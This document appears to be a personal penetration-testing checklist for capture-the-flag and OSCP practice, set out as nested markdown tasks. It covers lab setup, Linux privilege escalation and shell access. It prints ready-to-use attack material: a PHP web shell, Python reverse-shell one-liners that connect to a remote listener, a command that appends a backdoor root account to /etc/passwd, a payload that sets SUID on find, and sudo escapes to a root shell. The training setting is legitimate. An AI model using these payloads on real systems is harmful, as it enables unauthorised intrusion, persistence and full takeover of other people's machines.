# checklist

## Checklist

## Preperation

<details>

<summary>Expand</summary>

* [ ] Find IP of the machine
  * [ ] `export IP=<MACHINE_IP>`
  * [ ] `export MACHINE_NAME=<MACHINE_NAME>`
* [ ] Set folder structure
  * [ ] `cd ctf/`
  * [ ] `mkdir -p $MACHINE_NAME/enum`
  * [ ] `mkdir -p $MACHINE_NAME/files`
  * [ ] `touch $MACHINE_NAME/enum/users.txt`
  * [ ] `cp templates/report.md ctf/$MACHINE_NAME/${MACHINE_NAME}.md`
* [ ] Set hostname in etc/hosts (if helps)

</details>

## Enumeration

<details>

<summary>Expand</summary>

</details>

## Privilege Escalation

<details>

<summary>Expand</summary>

* [ ] privileges escalation
  * [ ] `sudo -l`
  * [ ] relative path exploitable?
    * [ ] Example: `sudo /sudo_permited_location/../home/user/my_file`
  * [ ] password re-use
    * [ ] from credentials founds in enum
    * [ ] `su - <user>`
      * [ ] ***Stabilize Shell $***
        * [ ] `which python` -> python is here
        * [ ] `python -c 'import pty; pty.spawn("/bin/bash")'` -> [interactive terminal spawned via python](https://github.com/demoninhead/nullbrain/blob/main/Explain/READEME.md)
        * [ ] `tty` quick test
        * [ ] `export TERM=xterm-256color` ⇾ export our terminal
        * [ ] `alias ll='clear ; ls -lsaht --color-auto'` ⇾ export ll command
        * [ ] `stty raw -echo; fg; reset` -> stable shell by control Z & backgrounding it
        * [ ] `stty columns 200 rows 200`
    * [ ] e.g: `sudo /usr/bin/mysql -e '\! /bin/sh'` [sudo nopass for mysql](https://gtfobins.github.io/gtfobins/mysql/#sudo)
  * [ ] `netstat -tupanl | grep -i '127.0.0.1'` -> anything running on loopback
  * [ ] Netstat alternative `ss -tunlp`
  * [ ] cat /etc/crontab
  * [ ] `find / -perm -u=s -type f 2>/dev/null`
    * [ ] *The first step is to identify all programs or files that have SUID bits enabled*
      * [ ] example
        * [ ] /usr/bin/zsh
    * [ ] Read Source Code (if any)
    * [ ] look for files owned by root grouped by user.
    * [ ] `ps aux | grep -i 'root' --auto-color` <-- anything running as root?
      * [ ] lateral machines? (not done anything like this)
      * [ ] private ip address? (not done anything)
      * [ ] web root -> any db credes?
  * [ ] Take advantage of this misconfiguration by abusing the PATH variable
  * [ ] Take advantage of misconfigured cronjob.
  * [ ] `find / -perm -u=g -type f 2>/dev/null` -> Are there any GUID
  * [ ] `ps ps auxwf` -> Check for any writeable Or,
  * [ ] `find / -type f -user root -perm /o=w | grep -v '/proc/`
  * [ ] File transfer
    * [ ] [Python http.server](https://github.com/demoninhead/nullbrain/blob/main/tools/file-transfer/README.md#python-simple-http-server)
  * [ ] simple HTTP server
    * [ ] download pspy
    * [ ] Second shell -> `pspy<BIT>`
    * [ ] `getcap -r / 2>/dev/null` -> Are there any extended permissions
    * [ ] exploit miss-configuration
  * [ ] writeable `passwd`?
    * [ ] `perl -le 'print crypt("PassWord","addedsalt")'`
    * [ ] `echo "nullBrain:saltedvaluefromabove:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd`
  * [ ] Privilege escalation Enum
    * [ ] `https://github.com/diego-treitos/linux-smart-enumeration` (is this allowed in OSCP?)
    * [ ] `https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS` (is this allowed in OSCP?)
  * [ ] `kernel exploits?`
    * [ ] <https://github.com/mzet-/linux-exploit-suggester>
    * [ ] e.g Dirty Cow [example HowTo](https://github.com/demoninhead/nullbrain/blob/main/CTF/Checklists/practical/dirty_cow/README.md)
  * [ ] `world writable exploit`
    * [ ] `echo "<?php system('chmod +s /usr/bin/find'); ?>" > /stuffed`
    * [ ] Using find related exploit
      * [ ] `find .-exec /bin/bash -p \; -quit`

</details>

## Remote Code Execution (RCE)

<details>

<summary>Expand</summary>

* [ ] Remote Code Execution
  * [ ] `<?php system($_GET['cmd']);?>`
  * [ ] Verify RCE
    * [ ] e.g : `http://$IP/<path>/?lang=/var/ftp/pub/backdoor.php&cmd=id`.\`
    * [ ] Payload:
      * [ ] <https://github.com/nullbr41n/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md>
      * [ ] payload converter (hURL)
        * [ ] hURL -U export RHOST="$IP"; export RPORT="$PORT";python -c xxxx
      * [ ] `python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'`
      * [ ] `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`

</details>

## Reverse Shell

<details>

<summary>Expand</summary>

* [ ] Reverse Shell
  * [ ] web uploads
    * [ ] `nc - nlvp 1` `Listening on port 1`
    * [ ] Upload payload on other side, should open connection
    * [ ] check RCE section.
      * [ ] ***Stabilize Shell $***
        * [ ] `which python` -> python is here
        * [ ] `python/python3 -c 'import pty; pty.spawn("/bin/bash")'` -> import valid tty
        * [ ] `tty` quick test
        * [ ] `export TERM=xterm-256color` ⇾ export our terminal
        * [ ] `alias ll='clear ; ls -lsaht --color-auto'` ⇾ export ll command
        * [ ] `stty raw -echo; fg; reset` -> stable shell by control Z & backgrounding it
        * [ ] `stty columns 200 rows 200`

</details>